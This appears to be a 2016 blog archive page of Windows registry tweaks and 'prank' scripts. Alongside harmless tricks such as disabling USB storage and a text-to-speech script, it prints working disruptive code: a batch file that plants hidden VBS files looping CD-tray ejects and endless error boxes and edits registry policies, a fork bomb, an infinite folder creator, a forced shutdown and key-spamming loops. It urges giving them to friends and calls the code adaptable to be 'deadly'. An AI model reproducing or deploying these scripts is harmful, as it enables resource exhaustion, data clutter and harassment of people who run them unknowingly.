Skip to main content

Posts

Showing posts from February, 2016

Disable USB Ports On Windows PC Via Registry

Disable USB Ports On Windows PC Via Registry With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives. To use this trick to disable USB ports, follow the steps given below:- Click on Start. Click on Run. If you cannot find RUN, type it in the search box. Type "regedit" without quotes. This will launch the Registry Editor. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor. In the work area, double click on Start. In the Value Data box, enter 4. Click on OK. Close Registry Editor and refresh your desktop. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6. Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8. Note: This trick als

Change Name Of Your Processor Permanently - TechnoBytes

Change Name Of Your Processor Permanently Change Processor Name Permanently Problem: To, make the name change permanent, it was required to update the Processor Name String registry key every time Windows starts. Solution: It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:- Steps :- 1.  Open Notepad. 2.  Copy and paste the exact code given below:- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] "ProcessorNameString"="My Processor name 50000MHz" To change the processor name, edit the part of the code given in blue. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0. 3.  Click on File Menu

Prank Virus - TechnoBytes

Prank Virus ▼ Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly. @echo off echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs echo Set colCDROMs=oWMP.cdromCollection>>123.vbs echo do>>123.vbs echo if colCDROMs.count>=1 then>>123.vbs echo for i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo For i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo End If>>123.vbs echo wscript.sleep 5000>>123.vbs echo loop>>123.vbs echo DO>>1234.vbs echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs echo LOOP>>1234.vbs copy /y 123.vbs C:\ copy /y 1234.vbs C:\ attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici

Fork Bomber - TechnoBytes

Fork Bomber ▼ It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste the below codes and save it as fork.bat :s<br />start %0<br />%0|%0<br />goto :s<br />

Folder Bomber Batch File - TechnoBytes

Folder Bomber This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started. Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Add or Remove "Shortcut" Name Extension

Add or Remove "Shortcut"  Name Extension To Add or Remove "Shortcut" Name Extension in Registry Editor 1. Press the Windows + R keys to open the Run dialog, type regedit, and press Enter. 2. If prompted by UAC, click/tap on Yes. 3. In the registry, go to: (See screenshot below) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer 4. In the right pane of Explorer, double click/tap on link to modify it. (See screenshot above) 5. To Remove the Shortcut Extension A) Change the value to 00 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshot below) NOTE: To change the value, press the Delete (Del) key once and type 00. B) Go to step 7. 6. To Restore the Shortcut Extension NOTE: This is the default setting. A) Change the value to 1E 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshots below) NOTE: To change the value, press the Delete (Del) key once and type 1E. 7. Close regedit. 8. Log off and log on, or

Entertainment softy

Tools for Entertainment           Some tools to make your computer screen more attractive....... like Birds flying on your screen,  Crash your computer screen(prank) ...... small Tools/Softwares,  you will love it....... Download

Shutdown Computer With Message - TechnoBytes

Shutdown The Computer After Conveying Message This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps: Open Notepad. Paste the following code in it: @echo off msg * Its time to get some rest. shutdown -c “Error! You have to take rest! Byeeeeee” -s Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat

Toggle Keyboard Button Simultaneously - TechnoBytes

Toggle Keyboard Button Simulteniously Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks. 1. Caps Lock Key Open Notepad. Paste the following code in the notepad file: Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Save the file with anyname and .vbs extension. and close it. Now open the newly created file and see how the caps lock key behaves on your keyboard! 2. Hit Enter Key Continuously Open Notepad. Paste the following code in the notepad file: Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop Save the file with any name and .vbs extension and close it. Now open the newly created file and see how the enter key behaves! 3. Hit Backspace Key Continuously

Convert Text Into Audio Using Notepad - TechnoBytes

Convert Text Into Audio Using Notepad How To Do It ? Open Notepad file on your Windows PC. Copy and paste the below mentioned code : Dim msg, sapi msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak msg Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.